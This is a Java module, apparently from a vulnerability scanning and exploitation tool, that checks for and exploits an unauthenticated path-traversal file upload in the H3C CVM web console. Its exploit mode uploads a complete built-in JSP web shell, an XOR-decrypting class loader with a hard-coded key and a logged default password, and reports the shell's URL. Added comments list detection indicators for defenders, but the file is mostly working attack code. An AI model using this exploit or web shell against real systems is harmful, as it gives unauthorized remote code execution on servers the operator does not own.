package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;

/**
 * Check/exploit module for an unauthenticated arbitrary file upload in the H3C CVM
 * web console, registered under the "H3C" mapping.
 *
 * <p>What the code shows: the upload endpoint {@code /cas/fileUpload/upload} is called with a
 * {@code token} query parameter containing a {@code ../} traversal sequence that resolves into
 * the Tomcat webapp directory, so the request body is written as a {@code .jsp} file under
 * {@code /cas/js/lib/buttons/} and is then fetched back over HTTP.
 *
 * <p>Detection notes for defenders, all taken from values in this file:
 * <ul>
 *   <li>requests to {@code /cas/fileUpload/upload} whose {@code token} parameter contains
 *       {@code ../} or an absolute webapp path;</li>
 *   <li>the fixed header set: {@code Content-range: bytes 0-10/20} with an empty
 *       {@code Content-type}, and a User-Agent ending in {@code Safari/537.31} (genuine Chrome
 *       builds send {@code Safari/537.36});</li>
 *   <li>newly created, randomly named {@code .jsp} files under {@code cas/js/lib/buttons/};</li>
 *   <li>file content equal to the PoC marker string, or containing the hard-coded key string of
 *       the built-in JSP payload.</li>
 * </ul>
 *
 * <p>NOTE(review): the file names no affected versions, advisory or CVE id; take remediation
 * details from the vendor advisory.
 */
@BasicMapping(uri = "H3C")
public class H3CController extends Controller implements BasicController{
    /**
     * Runs the H3C CVM file-upload check in one of two modes.
     *
     * <p>The annotation description reads "H3C CVM pre-auth arbitrary file upload vulnerability".
     *
     * <ul>
     *   <li>{@code POC}: uploads a fixed marker string to a randomly named {@code .jsp}, requests
     *       that file, and reports the target as vulnerable only if the response is 200 and its
     *       body contains the marker.</li>
     *   <li>{@code EXP}: uploads either the contents of the local file named by {@code args[0]}
     *       or, if that cannot be read, the built-in JSP payload; success is judged by a 200
     *       status alone.</li>
     * </ul>
     *
     * <p>NOTE(review): neither mode removes the file it uploads, so an assessment leaves an
     * artefact in the target's webroot that has to be cleaned up separately. Any other
     * {@code Poc_Exp} value falls through the switch and does nothing.
     *
     * @param type   mode selector; only {@code EXP} and {@code POC} are handled
     * @param target base URL, concatenated directly with the request paths (no normalisation of
     *               a trailing slash is done here)
     * @param args   optional; in {@code EXP} mode {@code args[0]} is cast to a String and treated
     *               as a local file path
     * @throws Exception declared on the signature; which calls can actually throw is not visible
     *                   from this file
     */
    @VulnerabilityDescriptionMapping(Description="H3C_CVM_前台任意文件上传漏洞" ,SupportVulType= SupportVul.UploadFile)
    public void vul_H3C_CVM(Poc_Exp type, String target, Object... args) throws Exception {
        // Log line: "starting check: H3C CVM pre-auth arbitrary file upload".
        WriteLog("\n[*]开始检测：  H3C_CVM_前台任意文件上传漏洞");
        // Request-body template; the whole string is the placeholder, so after replace() the body
        // is exactly the payload or marker.
        String data = "shellcode";
        // Path under which the uploaded file is later requested.
        String url2 = "/cas/js/lib/buttons/iconfig.jsp";
        // Upload request: the token parameter carries the traversal into the Tomcat webapp tree.
        // The "iconfig.jsp" suffix is swapped for a random name before use.
        String url = "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/iconfig.jsp&name=222";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        // NOTE(review): decodes with the platform default charset.
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        // Log line: "file read failed". mypayload stays null, so the built-in
                        // payload below is used instead of aborting.
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){
                    // NOTE(review): swallowed silently. A missing or non-String args[0] ends up
                    // here and the run continues with the built-in payload.
                }
                // Built-in JSP payload. As written, the JSP reads the POST body, XORs it with the
                // hard-coded key, defines a class from the resulting bytes and instantiates it,
                // which gives anyone who can reach the file code execution in the servlet container.
                // The key literal and the "class U extends ClassLoader" fragment are stable
                // strings to search for in a webroot or in upload traffic.
                String payload = "<%@page import=\"java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*\" %>\n" +
                        "<%!\n" +
                        "private byte[] Decrypt(byte[] data) throws Exception\n" +
                        "{\n" +
                        "    String key=\"e45e329feb5d925b\";\n" +
                        "\tfor (int i = 0; i < data.length; i++) {\n" +
                        "\t\tdata[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));\n" +
                        "\t}\n" +
                        "\treturn data;\n" +
                        "}\n" +
                        "%>\n" +
                        "    <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return\n" +
                        "        super.defineClass(b,0,b.length);}}%>\n" +
                        "        <%if (request.getMethod().equals(\"POST\")){\n" +
                        "            ByteArrayOutputStream bos = new ByteArrayOutputStream();\n" +
                        "            byte[] buf = new byte[512];\n" +
                        "            int length=request.getInputStream().read(buf);\n" +
                        "            while (length>0)\n" +
                        "            {\n" +
                        "                byte[] data= Arrays.copyOfRange(buf,0,length);\n" +
                        "                bos.write(data);\n" +
                        "                length=request.getInputStream().read(buf);\n" +
                        "            }\n" +
                        "        new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}\n" +
                        "    %>";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    // Log line: "default shell is the Behinder shell, password rebeyond".
                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
                }
                // Random file name; presumably 4 characters, going by the argument (helper not shown).
                String expshellpath = Utils.getRandomString(4)+".jsp";
                url = url.replace("iconfig.jsp",expshellpath);
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                // Fixed header set, identical in both modes and usable as a request fingerprint.
                httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest3.addHeaders("Content-range"," bytes 0-10/20");
                httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest3.addHeaders("Content-type","");
                httpRequest3.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                httpRequest3.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                data = data.replace("shellcode",payload);

                // The upload response is not inspected; the outcome is judged by the follow-up GET.
                httpRequest3.Post(data);

                Response result1 = new HttpRequest(target +url2.replace("iconfig.jsp",expshellpath)).Get("");
                // Only the status code is checked here, unlike the POC branch, so any 200
                // (e.g. a catch-all page) is reported as success.
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +url2.replace("iconfig.jsp",expshellpath));
                }else {
                    // Log lines: "access failed" / "please verify PoC reliability or whether the
                    // payload was blocked by AV".
                    WriteExpLog("\n 访问失败:\n"+target +url2.replace("iconfig.jsp",expshellpath));
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");

                }
                break;
            case POC:
                String shellpath = Utils.getRandomString(4)+".jsp";
                // Inert marker string written to the target; its presence in the fetched file is
                // the proof of write access. It also serves as an indicator when hunting for
                // leftover check files.
                String poc = "c0bb4ba866309a864d22f8853e8f7213";
                HttpRequest httpRequest2 = new HttpRequest(target+url.replace("iconfig.jsp",shellpath));
                httpRequest2.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.31");
                httpRequest2.addHeaders("Content-range"," bytes 0-10/20");
                httpRequest2.addHeaders("Accept-Encoding"," gzip, deflate");
                httpRequest2.addHeaders("Content-type","");
                httpRequest2.addHeaders("Accept-Language"," zh-CN,zh;q=0.9");
                httpRequest2.addHeaders("Accept"," text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                httpRequest2.Post(data.replace("shellcode",poc));
                Response result = new HttpRequest(target+url2.replace("iconfig.jsp",shellpath)).Get("");
                // NOTE(review): responseBody is dereferenced before the status check; if Response
                // can leave it null on a failed request this throws. Confirm against Response.
                if(result.responseBody.contains("c0bb4ba866309a864d22f8853e8f7213")&&result.statusCode==200){
                    // Log lines: "vulnerable" / "visit: <url>". The marker file stays on the target.
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("访问："+target +url2.replace("iconfig.jsp",shellpath));
                }else {
                    // Log line: "not vulnerable".
                    WriteLog("\n[-] 不存在漏洞");
                }
                // No break: POC is the last case, so nothing falls through.
        }
    }
}
